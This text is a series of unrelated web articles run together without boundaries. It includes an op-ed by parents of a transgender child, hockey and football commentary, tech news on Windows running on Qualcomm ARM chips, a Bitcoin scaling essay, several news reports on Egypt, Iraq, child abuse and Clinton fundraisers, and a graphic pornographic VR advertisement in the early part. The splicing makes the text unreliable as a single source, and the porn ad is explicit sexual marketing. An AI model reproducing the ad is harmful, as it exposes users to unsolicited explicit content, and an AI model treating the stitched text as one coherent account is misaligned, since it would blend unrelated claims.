She says, “Our hearts are broken for all the elementary school children who are being taught that a mental illness called Gender Identity Disorder … is a normal behavior called transgender.”
As parents of a beautiful, happy and healthy transgender child attending school in Alameda, our hearts are broken by the thousands of gender-nonconforming children who face violence, verbal and sexual harassment, increased dropout rates and institutional bias — and who take their own lives at three times the rate of their peers — largely because they have been diagnosed as mentally ill and treated accordingly.
We can assure Kerry Cook that our child and many more transgender children and adults we know are far from being mentally ill.
Transgender and gender-nonconforming kids and adults live in a gendered culture into which they often do not easily fit. If they face psychological problems, it's because they experience an inner sense of not belonging along with external discrimination and denial of basic human rights.
A debate is raging in the psychiatric community about the appropriateness of Gender Identity Disorder as a designated illness. According to the American Psychological Association's 2009 Task Force Report on Gender Identity and Gender Variance, “there is a great deal of disagreement about the GID diagnosis and whether it is helpful or harmful.”
Our agenda as parents is to ensure our child's safety and happiness at home and at school, especially when we are talking about a child who is at high risk of being bullied and marginalized. The fact that we have to qualify our child's safety and happiness in terms that read “regardless of race, color, disability, national origin, sexual orientation or gender ” (or, in our case, “gender identity”) says a lot about our society that is not complimentary.
We are both from conservative backgrounds, which did not entirely prepare us for the parenting challenges that come with raising a transgender child. Nevertheless we have been blessed with a supportive and accepting school environment that has been properly educated about this issue.
The key to the happiness and mental health of our child has been the safe, loving and accepting environment we provide at home coupled with the support of our families, friends, neighbors and our amazing school community. We thank them all.
Maria José Muñoz and Rafael Pineda live in Alameda.
With the 2013-14 season for the Winnipeg Jets coming to a close with a win Friday night in Calgary, it's time to take a look at the studs and duds for the Jets organization this past season.
Studs
Mark Scheifele
The Jets are a young team as it is. The team's nucleus is comprised of a majority of young players with a little amount of polished veterans making a difference. This year, two of the Jets the biggest contributors were rookies Jacob Trouba and Mark Scheifele. The former first overall draft picks found ways to shine in their respective ways. Despite a slow start, Mark Scheifele had a successful rookie season. He started out on the third line and had his struggles finding his place on the team. It looked like he wasn't ready for the NHL game, physically and mentally. Fans and media thought that he needed to tweak his game and develop in the minors and he needed a stop in St Johns with the Icecaps. However, once December came along Scheifele began to take stride, tallying 11 points in 14 games. He found chemistry with Evander Kane and Blake Wheeler and eventually found himself comfortable and thriving in his role of second line centre. Scheifele was injured prior to the trade deadline. The teams decline in production showed how crucial Scheifele was to the team.
Jacob Trouba
Meanwhile, on the backend, Jacob Trouba has thrived from day one with the Jets. The former Michigan Wolverine jumped into the lineup and has displayed the ability to log big minutes. He led all rookies with time on ice per game while averaging 22:36 per night. Not too shabby for a 20 year old. Though Trouba primarily focused on his defensive responsibilities he wasn't one to shy away from a chance to get involved offensively. He proved this by finishing tied for 11th in rookie scoring with 29 points (10G & 19A). Trouba's ability to play in all situations is impressive considering this was his rookie season. All signs indicate he is on the path to have a successful NHL career and be a franchise NHL defenceman in the years to come.
Paul Maurice
Disgust filled the hearts of Jets fans on the eve of January 11th. The Jets had lost their 5th straight game and it was apparent that something needed to be changed. The next day, Claude Noel was fired and Paul Maurice was brought in to replace him. The job was described by Maurice and Cheveldayoff as a sort of consulting position; a set of eyes outside of the organization to lend a hand in there evaluation period to prepare for next year. Playoffs were a distant thought and not the concern for fans. They just wanted to see some change. In Maurice's first 10 games as the Jets coach the team went 8-2. It was a fun part of the season but still nothing much was expected in terms of playoff hopes. But as the Olympic break began playoffs looked like a serious possibility. Those dreams would soon be crushed but nevertheless fans enjoyed the ride and Maurice started winning over the hearts of Jets fans. Maurice has stated that it's his family's choice on wether he comes back next year. Maurice has stated he loves it in Winnipeg and has enjoyed his time but reiterates his family comes first. He is a family man. With a full training camp to get his message across to players, Maurice could implement a solid foundation and system within the group.
Blake Wheeler
The Winnipeg Jets this season have been called a team with out a “star.” Wheeler might not be a star but as of late he has been playing like one. Wheeler finished the year with career high 69 points (28G & 41A) in 82 games. The speedy power forward is a force when he drives to the net. His admirable combination of size and speed in his game is lethal. He was named to the Team USA's Olympic hockey team. Even though he did not play much, after the Olympic break he came back to Winnipeg engaged and ready to compete. Despite Wheeler's rather slow start he found a way to bounce back and return to regular form. Wheeler has proven to be a leader on the ice, leading by example. When Wheeler is engaged he can truly be a game changer. This year Wheeler was the Jets the best player. He has my vote for team MVP this season and he did everything well this season. He is a true warrior and competitor and a fun player to watch.
Honarable mentions: Michael Frolik and Bryan Little
Duds
Kevin Cheveldayoff
I do not believe in a team being better than their record. That sort of chatter tends to be brought up a lot here in Winnipeg. There are a lot of unrealistic expectations with this Winnipeg Jets team. Lets say it how it is: This team did not have a chance to compete for a playoff spot. The lineup was not built to compete in the West. Cheveldayoff failed to put together a team with talent throughout the lineup. When Mark Scheifele was injured this become very apparent. Olli Jokinen could not step in and fulfill the duties as the second line centre, creating a gaping whole at the centre. The team lacked depth at forward. Due to the lack of depth the Jets had to play three lines and then fatigue came into play. The defenceman and goaltending need some work as well. Cheveldayoff needs to become less reluctant to make a move this offseason.
Evander Kane
There always seems to be something to talk about with Kane. Wether it's the infamous “money phone” incident, his alleged dining and dashing sprees or alleged assault lawsuit. In recent events Kane was scratched for missing a team function. Times have been tough for Kane off the ice. But on the ice things haven't gone so smoothly either. Kane's point production declined this year. Yes, Kane was injured at times but that doesn't mean much. Kane is described as an elite player by some but I don't buy it. An elite player isn't invisible most nights when he isn't with top players. An elite player can create offence by themselves and not from their line mates. I think it's evident that its time for Kane to go. I also don't think Kane would mind a change at all. The Jets should act fast and trade Kane as soon as they can when his value is still high. If the right offer comes around the Jets could get some picks and prospects to help Chevy with his plan of drafting and developing.
Devin Setoguchi
Setoguchi's year in Winnipeg didn't go as well as expected. The Jets traded a second round pick for the former 30-goal scorer. Before the season, some had penciled in Setoguchi as the second line right wing for the Jets. During the year, Setoguchi found himself on the third and fourth lines and having multiple stints in the pressbox. Setoguchi was brought in to put the puck in the net. He seemed like he could be a perfect compliment to Evander Kane. His struggles offensively and his poor effort every night make this acquisition a dud. The Jets did not trade Setoguchi at the deadline, which came as a surprise to some. The truth is, how many teams really wanted him? The Jets are left with horrible memories of his playing time here and the thought that they wasted a second round pick on nothing.
Honorable mentions: Zach Bogosian
Have your say
WEST Bromwich Albion have joined the growing list of clubs keeping tabs on Celtic defender Virgil van Dijk.
The Sun reports that the Baggies are considering making an offer for the highly-rated Dutch stopper, and have had the 23-year-old watched on a number of occasions.
Hawthorns boss Alan Irvine has seen his side struggle in recent weeks and could put in a bid for the centre half.
But they face competition from Premier League rivals Sunderland, who are expected to make a January bid, and Arsenal, who have been loosely linked with the former Groningen player.
Other clubs credited with an interest in van Dijk include Southampton, West Ham, Sevilla, Hamburg, Newcastle and Liverpool.
Dynamo Moscow reportedly made an enquiry about the defender back in May while Manchester City were said to be monitoring van Dijk in January.
Ronny Deila is keen to hold onto the £8 million-rated defender - but a big-money bid could tempt van Dijk away from Celtic Park.
SCOTSMAN TABLET AND IPHONE APPS
• Download your free 30-day trial for our iPad, Android and Kindle apps
• Keep up to date with all aspects of Scottish life with The Scotsman iPhone app, completely free to download and use
Petite Virtual Reality Star Holly Hendrix is famous for her Anal scenes and today you will have the pleasure to take part in one.
Holly brought one of her glass butt plugs so she can get her asshole prepared for the fucking that you are going to give her. She will taunt and tease you while sticking the toy in her butt and then suck your cock so you can stick it in her asshole.
Strap your VR headset and fuck petite virtual reality star Holly Hendrix in her small asshole while she is moaning and screaming from pleasure.
Presented by NA. Follow the link and register for the whole movie and much more VR experiences. When you sign up for Naughty America you get access to their enormous archive of 2D videos as well. REGISTER NOW
Compatible VR Devices: PS VR, Google Daydream, Google Cardboard, Samsung Gear VR, Oculus Rift, HTC ViVe, and more.
Pornstars: Holly Hendrix
In the Video: Petite, Anal, Sex Toys, Deepthroat, Brunette, Domination, Hardcore
Where: In the Living Room
Studio: NaughtyAmericaVR
More Virtual Reality Porn
Windows RT tried, and failed, to deliver a full-fledged Windows environment on top of anemic ARM microprocessors. Now, Microsoft is trying again, with two major improvements: compatibility with the mainstream Win32 apps that PC users have enjoyed for years, and a new generation of powerful ARM chips to run them.
At its Windows Hardware Engineering (WinHEC) conference in Shenzhen, China, Microsoft said Thursday morning that it's partnered with Qualcomm to enable new, low-cost PCs. These are intended to replace Windows tablets built around Intel's Atom, a chip the company's essentially discontinued.
Traditional Windows apps can only run on X86 chips, not ARM—thus, the failed Windows RT. To get around this, Qualcomm (and only Qualcomm) is working with Microsoft to emulate X86 instructions, the companies said.
Mark Hachman This Atom-powered Asus Transformer Mini provides compact computing for a low price, but with performance sufficient for Web browsing and little else.
Why this matters: Though the PC may be in decline, two growth segments have been low-cost (priced between $200 and $300) and two-in-one laptops. This announcement promises that upcoming Qualcomm chips will have the chops to handle that kind of hardware, run apps like Photoshop, run efficiently on battery, and ship at consumer-friendly price points. This has us slavering for a shootout between Qualcomm and Intel's Core m—which sounds like it will happen in less than a year's time.
Finally, backward compatibility!
Sources at Microsoft and Qualcomm say the partnership is designed around the Qualcomm Snapdragon 835, a chip that's in production now and is due to ship in the first half of 2017, according to Qualcomm. The first Windows-on-ARM PCs are expected by the second half of next year.
For now, Microsoft is thinking of the Windows-on-ARM relationship strictly in terms of enabling a new class of mobile PCs with superior battery life. But backward compatibility with Windows has also been a Holy Grail of sorts for fans of Windows phones, and reopens the door for a phone that could run traditional Windows apps.
Windows RT, which shipped with the original Surface (and tablets powered by Qualcomm Snapdragon processors) never managed to escape the parched hinterlands of Microsoft's universal apps. Neither has Windows Mobile (with the exception of HP's Elite x3, which runs Win32 apps in a cloud-based environment). That's led to some frustration within the Windows community as Microsoft attempted to connect its various platforms. Ironically, Terry Myerson, who's expected to introduce the new Windows-on-ARM partnership in Shenzhen, actually seemed to tip his hand in late October about Microsoft's new plans. (So did an earlier Microsoft job listing, too.)
“Technically, there are really two things that are unique about Windows Mobile,” Myerson said, when ZDNet reporter Mary Jo Foley asked him about the future of its Windows Mobile operating system. “One is cellular connectivity and the other one is the ARM processors that are there.”
“So we're going to continue to invest in ARM and cellular,” Myerson continued. “And while I'm not saying what type of device, I think we'll see devices there, Windows devices, that use ARM chips. I think we'll see devices that have cellular connectivity.” (Microsoft is also expected to announce today that it will begin selling cellular plans for WWAN-connected PCs through the Windows Store.)
The new Qualcomm-powered PCs will be able to join corporate domains, making them more than just consumer devices. The message is clear: The line between Windows 10 Mobile and Windows 10 for desktop PCs is blurring—but just not how we originally thought it would.
The original Google Chromebook Pixel offered integrated cellular WWAN, but it was rarely used and dropped in later models. Microsoft apparently wants to change that.
Performance is priority one
Hearken back to 2008, when Asus and others tried to market a range of Atom-based PCs—and they largely flopped. Even recent Atom-powered products like the Asus Transformer Mini balk at heavy workloads. Consumers have turned back to Intel's Core chips (or Core m) instead.
That's what makes X86 emulation, at least on paper, a risky proposition. Emulation takes an instruction written for an X86 chip, intercepts it, and translates it into the chip's native instruction set. In practice, emulation can slow the chip's apparent performance considerably, as Transmeta learned in 2008.
That startup challenged Intel with its line of Crusoe chips, which emulated the X86 architecture at slower speeds, while offering considerable power savings. But Intel responded with its own line of low-power chips, largely maintaining its performance. That killed Transmeta's competitive advantage, and the company eventually went under.
Now, Microsoft seems to believe the performance of the Snapdragon 835 justifies its investment. Qualcomm hasn't said much about the 835 specifically, but the company has said that simply shrinking to a 10nm manufacturing process can improve performance by 27 percent and battery life by 40 percent, compared to the company's prior generation of 14nm chips. Below, Microsoft released a video showing off how the current Snapdragon 820 runs Windows 10 Enterprise, via its emulator.
Microsoft itself crafted the X86 hardware emulator, according to industry sources. The emulator software attempts to minimize any CPU overhead by handling only CPU calls. Instructions sent to any associated storage, I/O, or GPU are all handled natively by those components, the company said. One source said Adobe's Photoshop, one application Microsoft is expected to show at WinHEC, apparently runs well.
Unfortunately, we won't know how the new class of Snapdragon PCs will actually fare until Qualcomm ships the 835 and reviewers can get their hands on devices running the emulated software. The emulator won't run on today's hardware, meaning we'll have to wait until the end of 2017 to discover how well it works. (Microsoft's video, above, shows how well Windows runs on a Snapdragon 820, though.)
Nadir Aslam The Surface phone has achieved mythic status before it ever ships.
Hello again, Surface...phone?
Microsoft also isn't saying anything about the fabled Surface phone, which has been an on-again, off-again proposition for many months. The phone—which may not even be a phone—has been rumored to ship sometime next year. One of its flagship features was supposedly Win32 apps, a feature that looked increasingly doubtful when Intel killed most of its Atom chips.
In light of Myerson's earlier comments, however, the Surface phone could in fact be a small, Snapdragon-powered, cellular-connected device—not one you hold to your ear, but one you can talk to on your desk via Bluetooth or Skype.
Microsoft apparently sees Windows on ARM as a game-changing technology. But what that game actually will look like is still intriguingly hazy.
Updated at 8:24 PM with Microsoft's demonstration video.
Florida Atlantic head coach Lane Kiffin has had an interesting ride as a football coach.
Kiffin has been around the block a few times, and it seems every stop has had a bumpy ending. His most recent stop, offensive coordinator for Nick Saban and Alabama, ended abruptly just before the College Football Playoff Title Game.
Matt Hayes with Bleacher Report reports that things were especially testy at the end of Kiffin's run with Alabama.
At one point during Kiffin's last week in Tuscaloosa, an Alabama staffer says he was answering his phone on the field during practice, trying to assemble a staff and recruit for FAU while his current team was preparing for the College Football Playoff. He was showing up late to team meetings and missed the team bus after the CFP semifinal media day—at which he had told reporters he didn't recall a time when Saban was happy with his play-calling; he only recalled “the ass chewings.”
At the end of the day, Saban eventually had enough of Kiffin's antics.
“Nick was sick of all that nonsense, and that wasn't the half of it,” says a former Alabama staffer. “It had been building for a while. The last thing Nick wants is for something like that to infiltrate his process. He won't let that happen. One way or the other, Lane wasn't coaching at Alabama after last season. Nick just cut it one game short.”
Another former coworker mentioned that he, and others, wanted to physically fight Kiffin towards the end of their time together.
“By the end of our time together, I wanted to physically beat his ass,” says one former coach who worked with Kiffin. “And I wasn't the only one.”
One of his assistants from Tennessee claimed Kiffin's style was “fast and loose” during his stay in Knoxville.
“He did a helluva job. Probably still his best coaching job,” says one of Kiffin's assistants at Tennessee. “But he played fast and loose—there's no doubt about that. Would something have come up eventually that could've ended it all? Probably.”
Despite everything that has happened surrounding Kiffin, Saban still praises his ability. Saban does believe that Kiffin must learn that coaching is about working with people.
“Lane is a very smart coach,” explained Saban. “He knows the game, but what Lane will figure out, what every coach eventually figures out, is it's about people.”
Kiffin's time with FAU will end smoother than his other stops. His head coaching career may depend on it.
The Obama administration will announce curbs on a significant part of nonessential military aid to Egypt within a few days, U.S. officials said Tuesday, marking a shift in America's relations with one of its key Arab allies.
Officials would not provide figures about how much of the annual $1.2 billion in military aid would be withheld, but they said the primary focus will be a hold on the shipment of a dozen AH-64D Apache helicopters from an order placed four years ago.
Provision of crucial spare parts for the extensive U.S. military equipment that Egypt already has and training for the country's armed forces will continue, officials said. They said aid that supports counterterrorism initiatives and Egypt's relations with Israel, including security efforts in the Sinai Peninsula and monitoring along the border with the Gaza Strip, would also continue.
U.S. officials described the decision — which comes three months after a military coup toppled Mohamed Morsi, Egypt's first democratically elected president — on the condition of anonymity. Neither Congress nor Egyptian officials have been notified of the decision, and the announcement could be postponed.
“We will announce the future of our assistance relationship with Egypt in the coming days,” Caitlin Hayden, a spokeswoman for the National Security Council, said in a statement.
1 of 42 Full Screen Autoplay Close Skip Ad × A day of ‘rage' in Egypt View Photos Fierce clashes erupted across Egypt on Friday as thousands of supporters of ousted president Mohamed Morsi took to the streets in the aftermath of government raids on pro-Morsi protest camps that left hundreds dead. Caption Fierce clashes erupted across Egypt on Friday as thousands of supporters of ousted president Mohamed Morsi took to the streets in the aftermath of government raids on pro-Morsi protest camps that left hundreds dead. Buy Photo Wait 1 second to continue.
Citing President Obama's address to the U.N. General Assembly last month, Hayden said, “As the president made clear at UNGA, that assistance relationship will continue.”
The Apache shipment that will be placed on hold is part of an $820 million, 12-aircraft order dating from 2009. The hold, which can be lifted at a later time, is a more symbolic move than a substantive loss for the Egyptians, who have about three dozen Apaches from previous orders.
The decision reflects increasing frustration within the Obama administration that Egypt's military leadership, which has been running the country since the July coup, is not moving swiftly enough toward new elections.
Egypt's coup and ensuing political violence has challenged Obama, forcing him to choose between maintaining relations with a strategic partner in the Middle East and punishing the military government there for toppling Morsi and cracking down on his supporters.
Hundreds have been killed in the violence, which has surged again in recent days.
U.S. law forbids most aid to countries whose elected governments are overthrown in a military coup — a term that Obama, as a result, has declined to use. Exceptions include money deemed as serving U.S. national security interests, such as counterterrorism assistance.
The administration had tried to persuade the Egyptian military against using force to oust Morsi or end street encampments by his Muslim Brotherhood supporters. It had also warned that a cutoff of aid was possible.
The large block of aid, which is used by Egypt mostly to order U.S.-made defense equipment such as Apache helicopters and F-16 warplanes, is a bedrock of American security and diplomatic policy in the Middle East. The administration had already suspended the transfer of some military equipment.
The money, historically second only to U.S. annual aid to Israel, is tied to Egypt's decision more than 30 years ago to make peace with the Jewish state.
The administration has been reviewing aid to Egypt since the coup and was loath to suspend the assistance for fear of losing what little leverage the United States had to pressure Egypt's military-backed interim government to call new elections. Some Persian Gulf states, opposed to Morsi and his Islamist supporters, have donated billions to the interim government.
Karen DeYoung contributed to this report.
Scalability, Hard Forks and Markets
Stephen Pair Blocked Unblock Follow Jan 6, 2016
This is the third of four articles outlining BitPay's current throughts and plans regarding the block size issue. It follows yesterday's article: Bitcoin as a Settlement System.
This article covers several topics that didn't fit neatly into the other articles, but are important and relevant to the ongoing debates about the scalability, upgradeability and the future of Bitcoin in general.
The Fear of Hard Forks
The Bitcoin community is paralyzed with fear when it comes to hard forks. While it's understandable, it's something we need to get past. Unless you believe that Bitcoin can have a future without any hard forks, we must be able to successfully manage a hard fork or Bitcoin will eventually perish. The Bitcoin community has always held the view that if there is a fatal flaw in Bitcoin, it's better to discover it sooner rather than later (when the stakes are potentially much higher). Perhaps it is better that we deploy a hard fork sooner rather than later. It would be reassuring to know that we can successfully incorporate new innovations into Bitcoin.
Bitcoin is Not Inherently Less Efficient than Centralized Payment Networks
Many people believe that Bitcoin is inherently less efficient than centralized payment networks like Visa and MasterCard. It isn't. When comparing Bitcoin with these systems, people typically point out there is a lot of waste and inefficiency because you have so many nodes performing redundant work. But it's not required that we have lots of nodes validating transactions.
Bitcoin would work perfectly well if only one node was validating transactions and building the block chain. And due to the nature of a Bitcoin transaction, you don't need to employ costly machine learning algorithms to combat fraud (as the card networks do). However, there is one caveat; you have to fully trust the one node performing the validation. But that's no different than the trust you have to place in the card network operators.
To eliminate the need to trust a single, centralized validation node, you can choose to run your own node and perform your own validation. That is a feature of Bitcoin that the card networks don't have. There are only as many nodes on the Bitcoin network as there is demand to perform independent and trust-less validation of transactions. Yes, at a macro level, a lot of redundant work is being performed, but all of that extra work has value to someone.
In the degenerate case of only one centralized node, which is most comparable to the legacy card networks, Bitcoin is probably more efficient.
The Value of Running a Full Node
When you run your own Bitcoin node, you have an added level of safety compared with someone using a lightweight wallet or a Bitcoin bank. You aren't relying on a third party to verify that the Bitcoins someone has sent to you are valid. You aren't relying on them to tell you when that transaction has been confirmed in a block (or how many confirmations it has).
If your wallet is using a third party service to interface with the Bitcoin network, you are placing trust in that third party to tell you the truth about the state of the Bitcoin system. If such a service wanted to defraud you, they could tell you that you've received a payment that has been confirmed, when in fact it hasn't. That might be an acceptable risk if you're dealing in small amounts of value. Or it might be acceptable if you have a close relationship with the third party (maybe it's your employer or a small organization you're a part of). But in other circumstances, it would be completely unacceptable.
At BitPay for example, we run a lot of Bitcoin nodes and we are able to verify transactions without having to trust any third party. Likewise, many individuals, organizations and service providers also run their own nodes because of the value of that independence. It reduces third party risk. The more widely used and significant Bitcoin becomes, the more people and companies will have a need to perform their own, independent transaction verification.
Shameless plug: if you use the Copay wallet, considering running your own instance of the bitcore wallet service: bitcore.io
A Fee Market Already Exists
The Bitcoin block size limit that Satoshi set back in 2010 was a stop gap measure intended to prevent a trivial denial of service attack. It was not intended to create an arbitrary and artificial scarcity for space in the block chain. At 1mb, this limit was well above the market demand for transaction volume at the time and allowed a proper transaction fee market to develop.
Miners already have plenty of disincentive for including transactions in a block. Each additional transaction included in a block increases the risk that the block might be orphaned. Therefore, miners will prefer to only include transactions that provide enough fee revenue to offset the increased orphan risk.
Today, the demand for transactions is bumping up against this artificial limit and is impairing the proper functioning of the Bitcoin network. As a result of this artificial scarcity, miners are being forced to only include transactions with artificially high fees. Eventually, Bitcoin transactions will be priced out of the market and alternative cryptocurrencies (or perhaps a fork of the Bitcoin block chain) will take market share. The transaction fee market is alive and well. If Bitcoin fails to deliver a product people want at a price they find attractive, there are many other options.
The Market for Bitcoin Scalability Enhancements
If the block size limit was a consensus rule that was allowed to adjust with the market demand, miners could process increasingly larger volumes of transactions to meet the demand. Eventually they would bump up against the limits of the current Bitcoin implementations and incur increasing costs as a larger percentage of their blocks end up as orphans. Miners would constrain the size of their blocks while developers work to improve scalability and performance. The increasing demand from users would provide the resources and incentive needed to invest in new technology to improve the scalability of Bitcoin.
Continue Reading: A Simple, Adaptive Block Size Limit
Turkish soldiers injured in second attack at Bashiqa camp in Iraq
Sevil Erkuş - ANKARA
DHA Photo
Five Turkish soldiers sustained injuries on Dec. 27 in the second attack this month on Bashiqa training camp in northern Iraq, Turkish sources have said.The first attack at the Sunni military camp in the Bashiqa region of Iraq's Mosul province occurred on Dec. 16, when Islamic State of Iraq and the Levant (ISIL) militants fired Katyusha ÇNRA projectiles at the camp.ISIL is the suspect of this fresh attack, during which one local Iraqi citizen was reportedly killed.On Dec. 16, the Turkish Armed Forces (TSK) said in a statement its soldiers returned fire and four were injured when Katyusha rockets landed in their camp north of the ISIL stronghold of Mosul.Turkey deployed around 150 troops to the Bashiqa area earlier this month with the stated aim of training an Iraqi militia to fight ISIL.The Turkish soldiers' presence in Iraq recently turned into a row between the two neighboring countries.The additional deployment of Turkish troops to the Bashiqa camp kicked off an angry exchange between the two capitals.Turkey said on Dec. 14 that some of its troops had begun leaving as part of reorganization, but Iraqi Prime Minister Haider al-Abadi's spokesman said it was not enough.
(CNN) -- A 13-year-old boy fled his home in Sacramento, California, over the weekend after his father and stepmother allegedly chained him to the kitchen table before they went to a casino, police said Monday.
The boy, who sustained bruises to his legs, arms and neck as a result of the chains, is now in the custody of his biological mother, Sacramento police Sgt. Norm Leong told HLN's "Prime News."
His father, John Vang, and stepmother, Thong Vue, are facing charges of false imprisonment and child cruelty, Leong said. County jail records show the couple were released from police custody Saturday night.
Police were alerted to the alleged abuse Friday night when a person spotted the boy wandering the neighborhood with the chains still around his body, Leong said.
"We do believe there were at least a couple of occasions where he was both chained and assaulted by his father," Leong said.
Neighbor Jarel Todd told HLN that he heard a "really loud and intense" argument early Friday evening coming from the home, "but as soon as it started, it ended," and he didn't go out to investigate the noise.
Todd said he had seen the boy in the past playing outside in the yard, and said he was "shocked" by the news.
"We have a quiet neighborhood," he said.
Another neighbor told CNN affiliate KOVR that the boy had approached her, asking for a chain-cutter. Samantha Xiong said she was frightened by the situation and told the boy she didn't have anything to help him.
"He walked away slowly because of his chains," she said, adding later that she regrets not calling authorities.
Leong said the boy was able to get a key to one of the padlocks to the chains and managed to free himself after his parents left the home.
The boy was apparently being punished for stealing something from a relative's home, Leong said.
The boy's mother is caring for him now, but Child Protective Services "will review everything to make [a] final determination" of who will have ultimate custody, Leong said.
In September, IDW Publishing and DC Entertainment announced plans for Love Is Love, an anthology created to support LGBT nonprofit and advocacy organization Equality Florida in the wake of the attack on the Pulse nightclub in Orlando, Fla., this summer.
Created and curated by writer Marc Andreyko, the title brings together the work of a number of creators, with more than 100 stories running no longer than two pages responding to the June attack that left 49 dead and 53 injured — including two stories featuring Archie Comics characters debuting exclusively on The Hollywood Reporter today.
"When Marc Andreyko approached me and Archie about including a story in Love Is Love, I knew we had to be a part of it — and that we also had to approach it in a direct way," Archie Comics Chief Creative Officer and Riverdale TV series showrunner Roberto Aguirre-Sacasa, who writes one of the two Archie entries in the collection, told THR. "It had to be in the more modern 'New Riverdale' style and obviously include our openly gay character, Kevin Keller. Marc then paired me with the supremely talented Stephen Byrne, who delivered gorgeous art. We often talk about how Riverdale exists in the real world today, so we're incredibly honored to be paying our respects to the terrible tragedy that happened in Orlando, along with so many of our colleagues in the industry."
"It was an honor and a privilege to be included with all the talented creators in this book," said Dan Parent, who created the Kevin Keller character for 2010's Veronica No. 202, and contributes a story to the collection. "More importantly, to give back to the families and victims of such a tragedy is simply the right thing to do. Let's help the healing process by contributing any way we can. And let's remember to keep fighting!"
"For as long as I've been steering the ship at Archie, we have striven to showcase the town of Riverdale as a welcoming, inclusive and friendly place for everyone," added Archie Comics Publisher/CEO Jon Goldwater. "Kevin Keller's introduction was a watershed moment not only for us as a company, but for comics and pop culture as a whole. It made perfect sense to join forces with our friends at IDW and DC Entertainment to include Kevin, Archie and his friends in Love Is Love. We're honored to be part of such an important book and will continue to strive for a real world that's as safe as Riverdale."
The 144-page collection, which features work by creators including Marguerite Bennett, Damon Lindelof, Jason Aaron, Kieron Gillen and Ed Luce, as well as an introduction by Wonder Woman director Patty Jenkins, will be published by IDW Publishing with the support of DC Entertainment on Dec. 21.
Systems that can identify emotions in images of faces might soon collate millions of peoples' reactions to events and could even replace opinion polls
IF THE computers we stare at all day could read our faces, they would probably know us better than anyone.
That vision may not be so far off. Researchers at the Massachusetts Institute of Technology's Media Lab are developing software that can read the feelings behind facial expressions. In some cases, the computers outperform people. The software could lead to empathetic devices and is being used to evaluate and develop better adverts.
But the commercial uses are just “the low-hanging fruit”, says Rana el Kaliouby, a member of the Media Lab's Affective Computing group. The software is getting so good and so easy to use that it could collate millions of peoples' reactions to an event as they sit watching it at home, potentially replacing opinion polls, influencing elections and perhaps fuelling revolutions.
“I feel like this technology can enable us to give everybody a non-verbal voice, leverage the power of the crowd,” el Kaliouby says. She and her colleagues have developed a program called MindReader that can interpret expressions on the basis of a few seconds of video. The software tracks 22 points around the mouth, eyes and nose, and notes the texture, colour, shape and movement of facial features. The researchers used machine-learning techniques to train the software to tell the difference between happiness and sadness, boredom and interest, disgust and contempt. In tests to appear in the IEEE Transactions on Affective Computing, the software proved to be better than humans at telling joyful smiles from frustrated smiles. A commercial version of the system, called Affdex, is now being used to test adverts (see “Like what you see?”).
Advertisement
The software proved to be better than humans at telling joyful smiles from frustrated smiles
Collecting emotional reactions in real time from millions of people could profoundly affect public polling. El Kaliouby, who is originally from Egypt, was in Cairo during the uprising against then-president Hosni Mubarak in 2011. She was startled that Mubarak seemed to think people liked his presidency, despite clear evidence to the contrary.
“She thought maybe Mubarak didn't think a million people was a big enough response to believe that people are upset,” lab director Rosalind Picard said at the lab's spring meeting on 25 April. “There are 80 million people in Egypt, and most of them were not there. If we could allow them the opportunity to safely and anonymously opt in and give their non-verbal feedback and join that conversation, that would be very powerful.”
Pollsters could even collect facial reactions on the streets, or analyse the reaction of an audience listening to a politician's speech. Picard's group recently ran an MIT-wide experiment called Mood Meter, placing cameras all over campus to gauge the general mood. To preserve privacy, the cameras didn't store any video or record faces – they just counted the number of people in the frame, and how many were smiling.
Frank Newport, editor-in-chief of political polling firm Gallup, headquartered in Washington DC, says such software could be useful. “There's no question that emotions and instincts have an impact in politics,” he says. “We're certainly open to looking at anything along those lines.” But he'd want to know how well facial responses predict actual votes.
Picard worries that the technology might have a dark side. “My fear is that some of these dictators would want to blow away the village that doesn't like them,” she says. It would be important to protect the identities and IP addresses of viewers, she says.
PROVINCETOWN, Mass. (AP) -- It was a very busy, very lucrative weekend for Hillary Clinton in the summer playground of the East Coast's moneyed elite.
She brunched with wealthy backers at a seaside estate in Nantucket, snacking on shrimp dumplings and crabcakes. A few hours later, she and her husband dined with an intimate party of thirty at a secluded Martha's Vineyard estate. And on Sunday afternoon, she joined the singer Cher at a "LGBT summer celebration" on the far reaches of Cape Cod.
By Sunday evening, Clinton had spoken to more than 2,200 campaign donors. But what she told the crowds remains a mystery.
Clinton has refused to open her fundraisers to journalists, reversing nearly a decade of greater transparency in presidential campaigns and leaving the public guessing at what she's saying to some of her most powerful supporters.
It's an approach that differs from the Democratic president she hopes to succeed. Since his 2008 campaign, President Barack Obama has allowed reporters traveling with him into the backyards and homes of wealthy donors to witness his some of his remarks.
While reporters are escorted out of Obama's events before the start of the juicier Q&A, the president's approach offers at least a limited measure of accountability that some fear may disappear when Clinton or Republican nominee Donald Trump moves into the White House.
"Unfortunately these things have a tendency to ratchet down," said Larry Noble, the general counsel of the nonprofit Campaign Legal Center. "As the bar gets lower, it's hard to raise it again."
Clinton's campaign does release limited details about her events, naming the hosts, how many people attended and how much they gave. That's more than Trump, whose far fewer fundraisers are held entirely away from the media, with no details provided.
Even some Democrats privately acknowledge that Clinton's penchant for secrecy is a liability, given voters continued doubts about her honesty.
While Clinton will occasionally take questions from reporters at campaign stops, she has not held a full-fledged news conference in more than 260 days. Trump has held several. She refuses to release the transcripts of dozens of closed-door speeches she delivered to companies and business associations after leaving the State Department, despite significant bipartisan criticism.
And since announcing her presidential bid in April 2015, Clinton has held around 300 fundraising events - only around five have been open to any kind of news coverage.
"It does feed this rap about being secretive and being suspicious," said GOP strategist Whit Ayers.
Clinton's aides have promised for weeks that greater access to her events will be coming soon. But Trump's lack of disclosure has given her political cover to keep the doors closed, particularly as she conducts a period of intense fundraising before the final sprint to Election Day.
While Clinton is expected to make only two public appearances before the end of August, she and her top backers will mingle with donors at no fewer than 54 events according to a fundraising schedule obtained by The Associated Press.
Reporters covering these events wait outside, in vans, parking lots and vacant guesthouses - even at homes they've entered with Obama at previous events. In Provincetown on Sunday, five reporters crowded into the corner of a parking lot, clinging to a chain link fence as they tried to catch Clinton's speech to a crowd of about 1,000 supporters.
None of her remarks seemed particularly remarkable: The candidate could faintly be heard running through her standard stump speech.
During a Saturday fundraiser at a stately Martha's Vineyard estate, faint cheers could be heard as Clinton addressed 700 donors on a green lawn overlooking the water. Staffers instructed drivers to roll up the windows of the vans where reporters waited before being ushered into a nearby guesthouse.
What a candidate tells his or her rich donors has long been a subject of intense speculation in American politics, in part because the message can be different than what they offer to voters.
